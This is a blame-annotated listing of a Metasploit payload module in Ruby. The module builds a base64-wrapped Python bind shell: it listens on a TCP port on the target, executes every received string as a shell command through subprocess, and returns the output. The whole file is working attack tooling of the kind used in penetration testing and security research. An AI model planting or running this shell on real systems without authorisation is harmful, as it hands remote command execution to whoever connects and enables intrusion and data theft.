2017-10-23 10:20:19 -04:00
|
|
|
|
|
|
|
|
module MetasploitModule
|
|
|
|
|
|
2022-11-05 15:58:10 -04:00
|
|
|
CachedSize = :dynamic
|
2017-10-23 10:20:19 -04:00
|
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2020-10-30 17:42:57 +08:00
|
|
|
include Msf::Payload::Python
|
2017-10-23 10:20:19 -04:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(merge_info(info,
|
|
|
|
|
'Name' => 'Command Shell, Bind TCP (via python)',
|
2020-11-20 16:33:35 -05:00
|
|
|
'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
|
2017-10-23 10:20:19 -04:00
|
|
|
'Author' => 'mumbai',
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Platform' => 'python',
|
|
|
|
|
'Arch' => ARCH_PYTHON,
|
|
|
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
|
'PayloadType' => 'python',
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Offsets' => { },
|
|
|
|
|
'Payload' => ''
|
|
|
|
|
}
|
|
|
|
|
))
|
|
|
|
|
end
|
|
|
|
|
|
2022-11-04 00:33:03 +00:00
|
|
|
def generate(_opts = {})
|
2017-10-23 10:20:19 -04:00
|
|
|
super + command_string
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def command_string
|
2020-11-06 13:53:22 +08:00
|
|
|
cmd = <<~PYTHON
|
|
|
|
|
import socket as s
|
|
|
|
|
import subprocess as r
|
|
|
|
|
so=s.socket(s.AF_INET,s.SOCK_STREAM)
|
|
|
|
|
so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))
|
|
|
|
|
so.listen(1)
|
|
|
|
|
so,addr=so.accept()
|
|
|
|
|
while True:
|
|
|
|
|
d=so.recv(1024)
|
|
|
|
|
if len(d)==0:
|
|
|
|
|
break
|
2023-06-08 06:44:37 +05:30
|
|
|
p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
|
2020-11-06 13:53:22 +08:00
|
|
|
o=p.stdout.read()+p.stderr.read()
|
|
|
|
|
so.send(o)
|
|
|
|
|
PYTHON
|
2017-10-23 10:20:19 -04:00
|
|
|
|
2020-10-30 17:42:57 +08:00
|
|
|
py_create_exec_stub(cmd)
|
2017-10-23 10:20:19 -04:00
|
|
|
end
|
|
|
|
|
end
|
